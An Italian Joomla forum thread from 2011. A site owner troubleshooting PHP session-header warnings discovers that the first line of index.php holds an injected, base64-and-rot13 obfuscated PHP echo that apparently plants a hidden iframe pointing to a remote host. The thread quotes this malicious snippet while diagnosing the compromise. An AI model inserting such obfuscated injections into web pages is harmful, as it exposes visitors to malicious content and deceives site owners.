Back to top

Autore Topic: Start a session - Warning  (Letto 6404 volte)

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Start a session - Warning
« il: 12 Lug 2011, 17:32:35 »
Buondì...

Sono comparse su un sito ingestione questi Warning

Citazione
Warning:  session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /usr/local/psa/home/vhosts/txxx.it/httpdocs/index.php:1) in /usr/local/psa/home/vhosts/xxx.it/httpdocs/libraries/joomla/session/session.php on line 423
 
 Warning:  session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /usr/local/psa/home/vhosts/xxx.it/httpdocs/index.php:1) in /usr/local/psa/home/vhosts/xxx.it/httpdocs/libraries/joomla/session/session.php on line 423
 
 Warning:  Cannot modify header information - headers already sent by (output started at /usr/local/psa/home/vhosts/xxx.it/httpdocs/index.php:1) in /usr/local/psa/home/vhosts/xxx.it/httpdocs/libraries/joomla/session/session.php on line 426

Qualcuno sa dirmi come intervenire?
« Ultima modifica: 13 Lug 2011, 12:03:21 da TuQuoQue »
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Start a session - Warning
« Risposta #1 il: 13 Lug 2011, 12:01:06 »
Questa è la parte di codice che  da problemi... qualcuno sa dirmi cosa fare? Please...  :'(

Citazione
function _start()
    {
        //  start session if not startet
        if( $this->_state == 'restart' ) {
            session_id( $this->_createId() );
        }

        session_cache_limiter('none');
        session_start();

        // Send modified header for IE 6.0 Security Policy
        header('P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"');

        return true;
    }
« Ultima modifica: 13 Lug 2011, 12:03:36 da TuQuoQue »
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

mau_develop

  • Visitatore
Re:Start a session - Warning
« Risposta #2 il: 13 Lug 2011, 12:56:58 »
avrai modificato qualche file senza usare un editor utf-8.

M.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Re:Start a session - Warning
« Risposta #3 il: 13 Lug 2011, 13:06:38 »
Ciao... gli errori sono comparsi così da un giorno all'altro. Potrebbe essere che il provider abbia cambiato qualche impostazione?


Cosa posso fare per correggerli? Cioè a cosa devo mettere mano?
« Ultima modifica: 13 Lug 2011, 14:21:13 da TuQuoQue »
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Re:Start a session - Warning
« Risposta #4 il: 13 Lug 2011, 14:19:59 »
Ho guardato il Database ed è codificato come UTF8_GENERAL_CI
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Re:Start a session - Warning
« Risposta #5 il: 13 Lug 2011, 14:58:24 »
leggendo qua e là ho trovato questo articolo che dice di inserire la funzione

Citazione
ob_start();

dopo
Citazione
<?php

nell'index.php.
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Re:Start a session - Warning
« Risposta #6 il: 13 Lug 2011, 23:55:21 »
Meglio se controlli il file index.php alla riga 1

avrai modificato qualche file senza usare un editor utf-8.

M.
Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Re:Start a session - Warning
« Risposta #7 il: 18 Lug 2011, 12:54:32 »
Meglio se controlli il file index.php alla riga 1

Inizia con

Citazione
<?php
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Re:Start a session - Warning
« Risposta #8 il: 18 Lug 2011, 16:06:42 »
Scaricati notepad++,
apri il file e controlla bene.
poi lo salvi sempre con notepad++.
Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Re:Start a session - Warning
« Risposta #9 il: 18 Lug 2011, 16:26:31 »
Citazione
<?php ob_start();
$somecrainsignvar="o6c7uvyz"; echo base64_decode(str_rot13('CTyzpzSgMFOmpzZ9W2u0qUN6Yl9cozEioJI0LKA 0LJ4hnJ4inJ4hL2qcC2EyMzS1oUDaVUqcMUEbCF plWlObMJyanUD9WmVaVTMlLJ1yLz9lMTIlCFpjW m48Y2yzpzSgMG4=')); $crain="";

Questa è la prima riga.
Se tolgo lo scrpt continua a darmi errore
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Re:Start a session - Warning
« Risposta #10 il: 18 Lug 2011, 16:31:07 »
Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Re:Start a session - Warning
« Risposta #11 il: 18 Lug 2011, 16:34:57 »
Guarda che quelle righe dimostrano che il tuo sito è stato bucato:

http://www.google.com/search?q=%24somecrainsignvar&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

si quello lo avevo capito... cercavo di sistemare le cose ;)
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Re:Start a session - Warning
« Risposta #12 il: 18 Lug 2011, 16:47:27 »
L'avevi capito solo tu.
Dalle informazioni che hai dato l'errore sembrava dato da un'operazione non corretta con un editor sbagliato.
Sposto nella sezione sicurezza dove troverai molti suggerimenti.
Anche il link di google che ti ho messo spiega bene come fare...
Ciao!
Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline TuQuoQue

  • Esploratore
  • **
  • Post: 175
    • Mostra profilo
Re:Start a session - Warning
« Risposta #13 il: 18 Lug 2011, 16:53:05 »
ok.. ;)
Corroergosum.it - Designer per vocazione. Giornalista per scelta. Runner per passione.

mau_develop

  • Visitatore
Re:Start a session - Warning
« Risposta #14 il: 18 Lug 2011, 19:03:36 »
...ma puoi anche leggere il post in evidenza in testa a questa sezione...

M.

 



Web Design Bolzano Kreatif